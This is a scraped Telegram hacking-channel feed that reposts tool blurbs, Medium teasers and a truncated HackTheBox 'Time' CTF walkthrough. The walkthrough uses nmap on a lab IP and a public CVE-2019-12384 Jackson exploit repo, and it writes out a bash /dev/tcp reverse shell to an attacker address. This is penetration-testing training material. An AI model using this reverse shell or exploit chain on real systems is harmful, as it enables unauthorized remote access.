Hacking Articles Tips Tricks Videos Tutorials
471 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Intro to IOT Hardware Hacking

https://cdn-images-1.medium.com/max/600/0*h6B7h67o4tMDXEB4.jpeg
When we talk about hardware hacking — we have physical device as attack surface, we have embedded devices to pentest on, One may try to…

Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Brigid Corday I finally saw this response but I am unable to respond directly to it, I have no…

I appreciate you and your reading this. I know it’s a long read, and it is abbreviated as I could have added another 2000–3000 words of…

Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Lucifer : A Powerful Penetration Tool For Automating Penetration Tasks

Lucifer is a Powerful Penetration Tool For Automating Penetration Tasks Such As Local Privilege Escalation, Enumeration, Exfiltration and More… Use Or Build Automation Modules To Speed Up Your Cyber Security Life git clone https://github.com/Skiller9090/Lucifer.gitcd Luciferpip install -r requirements.txtpython main.py –help If you want the cutting edge changes add -b dev to the end of git clone https://github.com/Skiller9090/Lucifer.git Commands […]

The post Lucifer : A Powerful Penetration Tool For Automating Penetration Tasks appeared first on Kali Linux Tutorials.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Waybackurls : Fetch All The URLs That The Wayback Machine Knows About For A Domain

Wayback urls accept line-delimited domains on stdin, fetch known URLs from the Wayback Machine for *.domain and output them on stdout. Usage example: cat domains.txt | waybackurls > urls Install: go get github.com/tomnomnom/waybackurls

The post Waybackurls : Fetch All The URLs That The Wayback Machine Knows About For A Domain appeared first on Kali Linux Tutorials.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles|Raj Chandel's Blog
Time HackTheBox Walkthrough

Hello! Everyone and Welcome to yet another CTF challenge from Hack the Box, called ‘Time,’ which is available online for those who want to increase their skills in penetration testing and Black box testing. Level:Medium<o:p Task:Find user.txt and root.txt in the victim’s machine<o:p Penetration Methodologies<o:p* Scanning<o:p

· Nmap<o:p

* Enumeration<o:p

· Browsing HTTP service <o:p

· Enumerating Json beautifier and validator<o:p

* Exploitation<o:p

· Exploiting com.fasterxml.jackson.core <o:p

· Linpeas to search for possible paths to escalate privileges<o:p

* Privilege Escalation<o:p

· Uploading reverse shell in timer_backup.sh<o:p

* Capturing the flag<o:p

<o:p Walkthrough<o:pNetwork Scanning<o:p<o:pLet’s get started then!<o:p

To Attack any machine, we need the IP Address. Machine hosted on HackTheBox have a static IP Address.<o:p

IP Address assigned to Time machine: 10.129.148.206<o:pLet us scan the VM with the most popular port scanning tool, nmap to enumerate open ports on the machine<o:p

nmap -A 10.129.148.206<o:phttps://1.bp.blogspot.com/-81VAj-px8ds/YK0Bz5URFMI/AAAAAAAAwNA/lYcF3xPGYGo9oBli58oIeZxs2vRVkkiLgCLcBGAsYHQ/s16000/1.png <o:pFrom the result above we found two working ports on the VM, port SSH(22), HTTP(80). <o:p

Since we don’t have the credentials for the SSH so we cannot enumerate it. The only service that is left is the HTTP service.<o:p

Enumeration<o:p

Starting with the HTTP service, we try to enumerate by accessing the IP Address of the target machine on a Web Browser. We see a website that features online Json beautifier and validator.<o:p https://1.bp.blogspot.com/-7PwHnxoqZXE/YK0CUbwLNAI/AAAAAAAAwNI/LPKS1FZ_RxYat9COa8_JGcSU55Gb73TiQCLcBGAsYHQ/s16000/2.png <o:p

We put something simple in beautifier to test and we received a message saying “null”.<o:p https://1.bp.blogspot.com/-fToMOCu-tPA/YK0CXXoga-I/AAAAAAAAwNM/HunXKvRpWiwLohSTJ-C5z5pXKJGD_d0IACLcBGAsYHQ/s16000/3.1.png So, we checked dropdown and there we saw validator function which is in beta and while giving a input we received an error related to com.fasterxml.jackson.core. <o:p https://1.bp.blogspot.com/-vtKKXgJafLI/YK0CgR2zJEI/AAAAAAAAwNQ/AnWtoEkPn9QUb9B2reEquxU4LtJp6iTxACLcBGAsYHQ/s16000/3.3.png <o:p

Next we did some research and on google we found a script which can be used to exploit com.fasterxml.jackson.core and is available on github repository.<o:p

https://github.com/jas502n/CVE-2019-12384<o:p

<o:p https://1.bp.blogspot.com/-TyDnDMCbcEk/YK0Cw1ykN1I/AAAAAAAAwNg/dpbr0sx2oBAHxrG53sG8DWrqu2W5OaczACLcBGAsYHQ/s16000/3.png As you can see in the image below, we cloned the repository to our local machine and to get reverse shell we need to edit the last line of the code in inject.sql file.<o:p

<o:p

git clone https://github.com/jas502n/CVE-2019-12384.git<o:p

<o:p https://1.bp.blogspot.com/-wnZ3mSaHrAs/YK0C0tH8lxI/AAAAAAAAwNk/VSVsvoRV15oZDmyWiaEbsB7HO8wMn1UmQCLcBGAsYHQ/s16000/4.png Getting user shell<o:pWe created a simple bash reverse shell script and added to our inject.sql file.<o:p

bash -i >& /dev/tcp/10.10.14.108/1234 0>&1<o:p

Next, we started python one liner SimpleHttpServer in our local machine to transfer the file from our machine to victim machine.<o:p

python -m SimpleHTTPServer<o:p https://1.bp.blogspot.com/-WzGWrfT0fbU/YK0C5VXmR4I/AAAAAAAAwNo/FzUPkpEyWrYDF9KT8mBND3DSerzUsoJqACLcBGAsYHQ/s16000/5.png We went to the function validate beta and entered the following payload which we got from git repository into the input field and then clicked pr[...]